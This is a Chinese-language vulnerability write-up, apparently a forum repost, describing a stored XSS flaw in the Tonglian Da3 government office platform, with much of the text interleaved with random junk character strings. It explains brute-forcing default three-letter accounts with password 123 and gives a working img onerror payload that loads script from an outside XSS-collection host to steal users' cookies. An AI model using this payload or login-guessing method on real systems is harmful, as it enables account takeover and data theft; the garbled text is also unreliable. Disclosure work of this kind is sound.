P/ ^9 s1 Z; A0 k
- A* F5 j3 n. F1 U ?' B 同联Da3协同办公平台后台通用储存型xss漏洞
: j8 I; O0 N/ P8 p, Z/ T( E% [
7 s8 E+ h5 L5 [% L* s
0 g! E) J' p" n0 x 平台简介:
: h1 u1 F- O% p5 ^$ F, b! J" H
3 q" l4 H1 h9 Y/ t0 `, L6 Z . a ? p8 Q/ M. b
\$ O) n( W& \5 R# `6 }4 f9 o
) M2 ]8 y. I6 H9 z" u2 E Y* Z2 G 7 m# }" _ N V: e1 V
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 }, a3 o% R( I* V# f
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 d9 t G* j- ]同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
7 F4 J( _$ B, E7 B0 {
2 w, B# F x8 d! e. [" y
* k' U0 H- F; n # r; r: j/ t+ R, k, m' o
. f" W6 `' r8 z6 C! i7 a ( n/ R0 X' ?: T) b* n0 V
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
8 F8 f R! v0 u
' _$ j1 V+ [& {$ F2 h
. m4 s0 L3 F: v& D% T
- D/ \' t- v; U* _9 x
3 {' [6 c. _1 Z! \+ _" D- S
7 @3 w5 r- E. o6 l; D6 D) o" w http://1.1.1.1:7197/cap-aco/#(案例2-)! m% E0 I% U( R* {5 C( S2 a
! b' j. K1 M4 z4 Y + G( o" L ~0 r0 A7 T( m
http://www.XXOO.com (案例1-官网网站)7 F0 ?1 T8 N8 P2 p/ E
: W3 ~- U4 G* J# q* B . a0 ]& l- i0 M. \4 O
漏洞详情:8 V! z8 ]7 h3 R5 t) J. m. A- K4 z
7 ^8 `# f; C6 x E3 M( K
# E$ S* e$ n! o1 p3 |8 \$ s
案例一、3 U) G" L/ C& o8 v8 X
% h% @& @6 \& R: W7 H
5 z6 r0 b- E( J" V% f+ s- I( M' Y% G, \8 L 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
# I- i& i" O6 U4 M' I
: h: `0 K' f! {
/ q1 @! T3 J2 D$ }3 J0 Z 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
1 b9 A) L* W5 G6 V
$ d5 A, s: I! n. j
+ r4 g. C9 P; F! N
2 L r* T- f' N W2 v
7 q) g2 D) b, U: R 6 e1 N/ D& g% s$ A a- }
, Z6 L* c/ [$ {, ~! u( F
) Z5 [7 ]5 ]2 ]/ z3 n
& G- A* V4 i |' g0 u2 L status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: . q' n @5 J$ r. t: t" t
) V/ d& q+ S6 J& Y F7 ?
) S& @8 v# c1 _* S/ a
: K f2 h. }# K4 ^1 j' q
$ v) C# D4 ?+ t( A" o
' b) b3 U, M$ g
5 t8 _. S {* l) `( H9 L$ `4 K
5 ]* h4 C6 n n9 i1 `& J' x( \, O( r ~, c8 z2 m3 G3 R U3 J/ p" J
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 7 S6 ]' s8 a4 K1 A1 E a
( U& _: O2 @, x; o
% w' ^+ r' A4 o& W& u9 D
1 T7 n% L1 ?6 r i
5 B j% `' Z% G3 V
$ D( u t% e# V( O% j* N) X
<img src=x3 {, ]: \/ P: r. J7 b: S
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
& b1 `% L' B: v; o- o3 o n' A' [
5 G( x( o- a1 V8 C 6 I* D2 E5 O6 o) C
" G4 L8 `- V: P6 R( l( L
1 `5 w1 Q- N3 d
) o4 B; o+ D7 s 然后发送,接收cookie如图: ) {; L( m6 \' o/ H+ P6 X$ ~
' m% q% s( g5 T8 [ % s: R5 ]& {5 O
# G# G) I# n4 I9 v/ }; P
9 I& v; A# `1 R; Q
* \! B3 f7 N1 S; k3 P8 {8 P' s* k W5 q$ j2 n* D7 o" I: n4 Z2 N
! \' k* b; g; p; `$ ^
" |/ P3 E/ e# n9 Y6 T 3 R7 |2 s, R( i" s1 i' V, o
& n `3 M& d- \0 K' P- G 8 }3 N/ T, @4 w- f
+ Y9 ~* T" R! z: p0 V' U7 D
% X9 {4 O( {1 R, G& J( Y
$ B8 `) I3 h/ v% H
) ~4 c! t: J- g+ m! w0 |# P
5 g* h) ^6 x: E) a" O5 E7 i5 [
* k+ i% Q- `+ m, `5 I7 w0 Z
" W0 V( c% x) D {$ D) }
K% _- h/ K+ u
! G" a8 S/ y, H0 o% ?
8 z: s) Z& O. I- t
: d7 U$ ]- V4 b8 m& l3 ^. k) x
. [( q/ Y' n- i; n
案例2、 . n0 J$ s* {" D( v
; i' l2 f& Y# A6 T+ ~
% L3 a9 m, _1 `. D( p3 @4 e$ o+ N 前面步骤都一样,下面看效果图:
( W1 g" w3 J( s+ V
f5 ~' w9 ?- G( y P
$ ~6 E* V8 Z5 ~ A" G4 @ N8 {
5 i }& M% G" U" e5 K+ l- M
/ O9 r4 U8 n- F, N3 y, N
/ G" h3 L9 {# _3 j* c0 r8 h' T
2 g4 q" z2 ^" ^( M# W' W5 o/ m0 U- c
- z" z$ u. ~; n
& M% j- I# u1 R; |( K
) _& ^& o/ Q' k, z$ {: P) T: o
8 J8 u, s: h" c" i4 g 2 d" g. k Q. ~* m# x8 e6 n
8 q5 \" @1 ?. v7 B" V7 a1 N$ |. r
, {0 m0 W3 P9 W& \ y9 ~, G9 O0 d 5 J: r% R+ \. s8 a3 [5 j" M$ l
2 L1 m: ^) a8 U1 b3 C# B$ I) M) Q5 O
6 a$ U0 C7 T. ]( m' s
Y! I" _8 R8 X4 J2 m 2 j, G. ^0 ^* D1 }% b
; f0 B2 d. B/ {* k6 B# m
" O0 n8 G! Q7 e" }
; f6 c5 K6 a. S( P: w
+ H+ V5 [2 F* s" S- ~8 O& a8 V
& W/ v4 G2 J$ E" Z
6 S% G9 R! q) Y/ I
9 V% U) w; [# N' c
/ S1 ]. j, B/ z& n7 D% k% c7 W% L% x
6 X5 o0 E0 L4 ?' u) T
* E6 a" S) D! o